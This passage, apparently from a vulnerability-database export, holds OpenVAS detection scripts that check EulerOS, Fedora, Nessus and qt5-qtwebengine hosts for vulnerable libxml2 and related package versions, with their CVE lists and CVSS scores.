value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:12:11 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:12:11 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for libxml2 (EulerOS-SA-2018-1089)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n 
script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1089\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1089\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'libxml2' package(s) announced via the EulerOS-SA-2018-1089 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function. (CVE-2016-5131)\n\nparser.c in libxml2 before 2.9.5 mishandles parameter-entity references because the NEXTL macro calls the xmlParserHandlePEReference function in the case of a '%' character in a DTD name. (CVE-2017-16931)\n\nparser.c in libxml2 before 2.9.5 does not prevent infinite recursion in parameter entities. (CVE-2017-16932)\n\nA flaw in libxml2 allows remote XML entity inclusion with default parser flags (i.e., when the caller did not request entity substitution, DTD validation, external DTD subset loading, or default DTD attributes). 
Depending on the context, this may expose a higher-risk attack surface in libxml2 not usually reachable with default parser flags, and expose content from local files, HTTP, or FTP servers (which might be otherwise unreachable).(CVE-2017-7375)\n\nBuffer overflow in libxml2 allows remote attackers to execute arbitrary code by leveraging an incorrect limit for port values when handling redirects.(CVE-2017-7376)\");\n\n script_tag(name:\"affected\", value:\"'libxml2' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.9.1~6.3.h10\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.9.1~6.3.h10\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.9.1~6.3.h10\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-02-15T00:00:00", "type": "openvas", "title": "Fedora Update for libxml2 FEDORA-2018-a6b59d8f78", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9049", "CVE-2017-8872", "CVE-2017-9048", "CVE-2016-5131", "CVE-2017-9047", "CVE-2016-4658", "CVE-2017-9050"], "modified": "2019-03-15T00:00:00", "id": 
"OPENVAS:1361412562310874119", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874119", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_a6b59d8f78_libxml2_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libxml2 FEDORA-2018-a6b59d8f78\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874119\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-02-15 08:49:42 +0100 (Thu, 15 Feb 2018)\");\n script_cve_id(\"CVE-2017-9047\", \"CVE-2017-9048\", \"CVE-2017-9049\", \"CVE-2017-9050\",\n \"CVE-2017-8872\", \"CVE-2016-4658\", \"CVE-2016-5131\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libxml2 FEDORA-2018-a6b59d8f78\");\n 
script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libxml2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libxml2 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-a6b59d8f78\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FMHEXSXRPASMXWMMIMMGZ5NAFH22EGNY\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.9.7~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:06", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-01-31T00:00:00", "type": "openvas", "title": "Fedora Update for libxml2 FEDORA-2018-db610fff5b", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-9049", "CVE-2017-8872", "CVE-2017-9048", "CVE-2016-5131", "CVE-2017-9047", "CVE-2016-4658", "CVE-2017-9050"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874073", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874073", 
"sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_db610fff5b_libxml2_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libxml2 FEDORA-2018-db610fff5b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874073\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-31 07:58:38 +0100 (Wed, 31 Jan 2018)\");\n script_cve_id(\"CVE-2017-9047\", \"CVE-2017-9048\", \"CVE-2017-9049\", \"CVE-2017-9050\",\n \"CVE-2017-8872\", \"CVE-2016-4658\", \"CVE-2016-5131\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libxml2 FEDORA-2018-db610fff5b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libxml2'\n package(s) announced via the 
referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libxml2 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-db610fff5b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PBWYRHEVCVJN2ELXKZBFGCVFBBOGVDL7\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.9.7~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:07", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-04-20T00:00:00", "type": "openvas", "title": "Fedora Update for libxml2 FEDORA-2017-a3a47973eb", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1840", "CVE-2016-1836", "CVE-2016-1762", "CVE-2016-1834", "CVE-2016-9318", "CVE-2016-1835", "CVE-2016-4449", "CVE-2016-1837", "CVE-2016-4448", "CVE-2016-1838", "CVE-2016-5131", "CVE-2016-1839", "CVE-2016-4447", "CVE-2016-4658", "CVE-2016-1833"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872591", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310872591", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libxml2 FEDORA-2017-a3a47973eb\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872591\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-20 06:41:51 +0200 (Thu, 20 Apr 2017)\");\n script_cve_id(\"CVE-2016-9318\", \"CVE-2016-4658\", \"CVE-2016-5131\", \"CVE-2016-1762\",\n \"CVE-2016-1834\", \"CVE-2016-1840\", \"CVE-2016-1838\", \"CVE-2016-1839\",\n \"CVE-2016-1836\", \"CVE-2016-4449\", \"CVE-2016-4448\", \"CVE-2016-1837\",\n \"CVE-2016-1835\", \"CVE-2016-4447\", \"CVE-2016-1833\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libxml2 
FEDORA-2017-a3a47973eb\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libxml2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libxml2 on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-a3a47973eb\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I6RYADVQ3O3C3UNPVVMTGCWLDPTVRGEJ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.9.4~2.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-04-20T00:00:00", "type": "openvas", "title": "Fedora Update for libxml2 FEDORA-2017-be8574d593", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1840", "CVE-2016-1836", "CVE-2016-1762", "CVE-2016-1834", "CVE-2016-9318", "CVE-2016-1835", "CVE-2016-4449", "CVE-2016-1837", "CVE-2016-4448", "CVE-2016-1838", "CVE-2016-5131", "CVE-2016-1839", "CVE-2016-4447", "CVE-2016-4658", 
"CVE-2016-1833"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872590", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872590", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libxml2 FEDORA-2017-be8574d593\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872590\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-20 06:41:10 +0200 (Thu, 20 Apr 2017)\");\n script_cve_id(\"CVE-2016-9318\", \"CVE-2016-4658\", \"CVE-2016-5131\", \"CVE-2016-1762\",\n \"CVE-2016-1834\", \"CVE-2016-1840\", \"CVE-2016-1838\", \"CVE-2016-1839\",\n \"CVE-2016-1836\", \"CVE-2016-4449\", \"CVE-2016-4448\", \"CVE-2016-1837\",\n \"CVE-2016-1835\", \"CVE-2016-4447\", \"CVE-2016-1833\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n 
script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libxml2 FEDORA-2017-be8574d593\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libxml2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libxml2 on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-be8574d593\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LAU7AKDLMTZM2WRM2TPNPFLYQCKYMG7G\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.9.4~2.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:33", "description": "This host is running Nessus and is prone to\n multiple vulnerabilities.", "cvss3": {}, "published": "2018-06-15T00:00:00", "type": "openvas", "title": "Tenable Nessus Multiple Vulnerabilities(tns-2018-08)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8388", "CVE-2017-16931", "CVE-2017-9233", "CVE-2016-9840", "CVE-2017-7375", "CVE-2017-7244", "CVE-2017-11742", 
"CVE-2015-8391", "CVE-2018-11214", "CVE-2016-9063", "CVE-2016-5300", "CVE-2015-8395", "CVE-2015-8382", "CVE-2017-5969", "CVE-2016-9318", "CVE-2015-8386", "CVE-2015-2327", "CVE-2017-9049", "CVE-2016-9842", "CVE-2017-8872", "CVE-2012-0876", "CVE-2012-6702", "CVE-2016-0718", "CVE-2015-8392", "CVE-2015-8389", "CVE-2018-9251", "CVE-2015-8380", "CVE-2017-9048", "CVE-2014-8964", "CVE-2016-1283", "CVE-2017-5029", "CVE-2015-8394", "CVE-2012-6139", "CVE-2016-5131", "CVE-2015-3217", "CVE-2016-3191", "CVE-2015-8384", "CVE-2016-9843", "CVE-2017-7246", "CVE-2017-7245", "CVE-2017-1000061", "CVE-2017-9047", "CVE-2016-1683", "CVE-2015-8383", "CVE-2016-1684", "CVE-2015-8381", "CVE-2017-7186", "CVE-2015-5073", "CVE-2017-18258", "CVE-2015-8385", "CVE-2016-9841", "CVE-2017-16932", "CVE-2015-9019", "CVE-2015-7995", "CVE-2015-2328", "CVE-2016-4472", "CVE-2014-9769", "CVE-2015-8387", "CVE-2015-8390", "CVE-2017-6004", "CVE-2017-9050"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310813437", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813437", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Tenable Nessus Multiple Vulnerabilities(tns-2018-08)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:tenable:nessus\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813437\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2017-11742\", \"CVE-2017-9233\", \"CVE-2016-9063\", \"CVE-2016-0718\",\n \"CVE-2016-5300\", \"CVE-2012-0876\", \"CVE-2016-4472\", \"CVE-2012-6702\",\n \"CVE-2018-11214\", \"CVE-2017-18258\", \"CVE-2017-16932\", \"CVE-2017-16931\",\n \"CVE-2017-9050\", \"CVE-2017-9049\", \"CVE-2017-9048\", \"CVE-2017-9047\",\n \"CVE-2017-8872\", \"CVE-2017-7375\", \"CVE-2017-5969\", \"CVE-2016-9318\",\n \"CVE-2016-5131\", \"CVE-2018-9251\", \"CVE-2017-1000061\", \"CVE-2012-6139\",\n \"CVE-2015-7995\", \"CVE-2015-9019\", \"CVE-2016-1683\", \"CVE-2016-1684\",\n \"CVE-2017-5029\", \"CVE-2016-9840\", \"CVE-2016-9841\", \"CVE-2016-9842\",\n \"CVE-2016-9843\", \"CVE-2014-8964\", \"CVE-2014-9769\", \"CVE-2015-2327\",\n \"CVE-2015-2328\", \"CVE-2015-3217\", \"CVE-2015-5073\", \"CVE-2015-8380\",\n \"CVE-2015-8381\", \"CVE-2015-8382\", \"CVE-2015-8383\", \"CVE-2015-8384\",\n \"CVE-2015-8385\", \"CVE-2015-8386\", \"CVE-2015-8387\", \"CVE-2015-8388\",\n \"CVE-2015-8389\", \"CVE-2015-8390\", \"CVE-2015-8391\", \"CVE-2015-8392\",\n \"CVE-2015-8394\", \"CVE-2015-8395\", \"CVE-2016-1283\", \"CVE-2016-3191\",\n \"CVE-2017-6004\", \"CVE-2017-7186\", \"CVE-2017-7244\", \"CVE-2017-7245\",\n \"CVE-2017-7246\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-15 
11:03:08 +0530 (Fri, 15 Jun 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Tenable Nessus Multiple Vulnerabilities(tns-2018-08)\");\n\n script_tag(name:\"summary\", value:\"This host is running Nessus and is prone to\n multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist as some of the third-party\n components used within Nessus to provide underlying functionality were found to\n contain various vulnerabilities. The components with vulnerabilities include\n expat, libjpeg, libXML2, libXMLSEC, libXSLT, Zlib and libPCRE\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers potentially to gain privileges, execute arbitrary code, bypass\n security restrictions, conduct denial-of-service, gain access to potentially\n sensitive information, conduct XML External Entity (XXE) attacks and unspecified\n other impacts.\");\n\n script_tag(name:\"affected\", value:\"Nessus versions prior to version 7.1.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Nessus version 7.1.1 or later. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://www.tenable.com\");\n script_xref(name:\"URL\", value:\"https://www.tenable.com/security/tns-2018-08\");\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_nessus_web_server_detect.nasl\");\n script_mandatory_keys(\"nessus/installed\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!nesPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:nesPort, exit_no_version:TRUE)) exit(0);\nnesVer = infos['version'];\npath = infos['location'];\n\nif(version_is_less(version:nesVer, test_version:\"7.1.1\"))\n{\n report = report_fixed_ver(installed_version:nesVer, fixed_version:\"7.1.1\", install_path:path);\n security_message(data:report, port:nesPort);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:C"}}, {"lastseen": "2019-11-22T16:28:42", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-07-24T00:00:00", "type": "openvas", "title": "Fedora Update for qt5-qtwebengine FEDORA-2017-98bed96d12", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5023", "CVE-2017-5012", "CVE-2017-5009", "CVE-2016-5224", "CVE-2017-5037", "CVE-2017-5044", "CVE-2016-5225", "CVE-2016-5208", "CVE-2016-5186", "CVE-2016-9651", "CVE-2017-5065", "CVE-2017-5026", "CVE-2016-9652", "CVE-2017-5033", "CVE-2017-5019", "CVE-2016-9650", "CVE-2016-5222", "CVE-2017-5059", "CVE-2016-5205", "CVE-2016-5221", "CVE-2017-5076", "CVE-2017-5017", "CVE-2016-5198", "CVE-2017-5007", "CVE-2016-5171", "CVE-2016-5133", "CVE-2017-5069", "CVE-2017-5050", "CVE-2016-5170", "CVE-2016-5207", "CVE-2017-5025", "CVE-2016-5215", "CVE-2016-5161", "CVE-2017-5071", 
"CVE-2017-5029", "CVE-2016-5147", "CVE-2017-5024", "CVE-2016-5185", "CVE-2017-5016", "CVE-2017-5046", "CVE-2017-5027", "CVE-2016-5181", "CVE-2017-5015", "CVE-2017-5047", "CVE-2017-5089", "CVE-2017-5010", "CVE-2017-5083", "CVE-2016-5214", "CVE-2017-5008", "CVE-2016-5153", "CVE-2016-5155", "CVE-2017-5067", "CVE-2017-5048", "CVE-2017-5075", "CVE-2017-5049", "CVE-2016-5188", "CVE-2017-5062", "CVE-2016-5192", "CVE-2017-5006", "CVE-2016-5172", "CVE-2017-5061", "CVE-2017-5070", "CVE-2017-5051", "CVE-2016-5187", "CVE-2016-5166", "CVE-2016-5078"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872901", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872901", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_98bed96d12_qt5-qtwebengine_fc24.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for qt5-qtwebengine FEDORA-2017-98bed96d12\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872901\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-24 05:44:15 +0200 (Mon, 24 Jul 2017)\");\n script_cve_id(\"CVE-2016-5133\", \"CVE-2016-5147\", \"CVE-2016-5153\", \"CVE-2016-5155\",\n \"CVE-2016-5161\", \"CVE-2016-5166\", \"CVE-2016-5170\", \"CVE-2016-5171\",\n \"CVE-2016-5172\", \"CVE-2016-5181\", \"CVE-2016-5185\", \"CVE-2016-5186\",\n \"CVE-2016-5187\", \"CVE-2016-5188\", \"CVE-2016-5192\", \"CVE-2016-5198\",\n 